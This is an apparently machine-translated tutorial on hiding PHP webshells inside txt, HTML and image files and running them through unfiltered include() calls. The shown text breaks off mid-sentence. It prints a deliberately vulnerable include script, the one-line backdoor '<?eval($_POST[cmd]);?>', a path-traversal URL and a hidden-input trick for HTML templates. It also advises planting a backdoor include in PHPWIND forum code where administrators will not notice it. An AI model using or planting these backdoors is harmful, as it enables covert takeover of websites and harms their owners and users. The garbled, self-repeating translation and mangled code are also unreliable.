You need to know that if you put the PHP statement in the image, it cannot be executed in any way, because PHP only parses and expands the file named php. Therefore, PHP statements hidden in images must be executed. With the help of the call functions in PHP: include and req, we need to know that if PHP statements are put in the image, they cannot be executed in any way, because PHP only parses and expands the file named php. Therefore, PHP statements hidden in images must be executed. We use the PHP call functions such as include and require.
We still remember the articles that used to hide Trojans from pictures a few days ago. You can also use statements such as include('x.gif ') in the PHP file to call the Trojan statement hiding in the image. The statements in ASP are similar. It seems very hidden, but it is not difficult to create suspicious things for people who know PHP a little bit. Because the GET method in the URL is difficult to pass parameters, the performance of the inserted Trojan is not displayed.
The include function is frequently used in PHP, so there are too many security titles. for example, the PHPWIND1.36 vulnerability is caused by no filtering of variables after include. Therefore, we can insert statements similar to the structure into the php file. Then, you can hide the Trojan horse in an image or HTML file, so that hiding is higher. For example, insert the following statement in the PHPWIND Forum: <''? @ Include includ/. $ PHPWIND_ROOT ;? <Mailto :? @ Include 'Maid/'. $ PHPWIND_ROOT;?> Generally, it cannot be seen by administrators.
With the include function, we can hide the PHP Trojan in many types of files, such as txt, html, and image files. Since txt, html, and image files are the most common in forums and document systems, we will test them in sequence.
First, create a php file test. php with the following content:
<? Php
$ Test = $ _ GET ['test'];
@ Include 'test/'. $ test;
?>
Txt files are usually clarification files, so we can put a Trojan in the clarification file of the Directory. Create a txt file t.txt. We put a Trojan in one sentence <? Eval ($ _ POST [cmd]);?> Paste it to the t.txt file. Then visit http: // localhost/test. php? Test = ../t.txt
HTML files are generally template files. To enable the Trojan horse inserted into the HTML file to be called and executed and not displayed, we can add a text box with hidden attributes in HTML, such: <input type = hidden value = '<? Eval ($ _ POST [cmd]);?> '> Then the application method is the same as above. Generally, you can view the source file for the returned results. For example, you can view the efficacy of the program directory in the application. View the source file content as <input type = hidden value = 'C: \ Uniserver2_7s \ www \ test'> I can get the directory C: \ Uniserver2_7s \ www \ test.
Next, let's talk about image files. the most poisonous way is to hide Trojans in images. We can compile an image directly? Eval ($ _ POST [cmd]);?> Insert it to the end of the image.
Generally, the image is not affected by tests. Then, in the same way, add
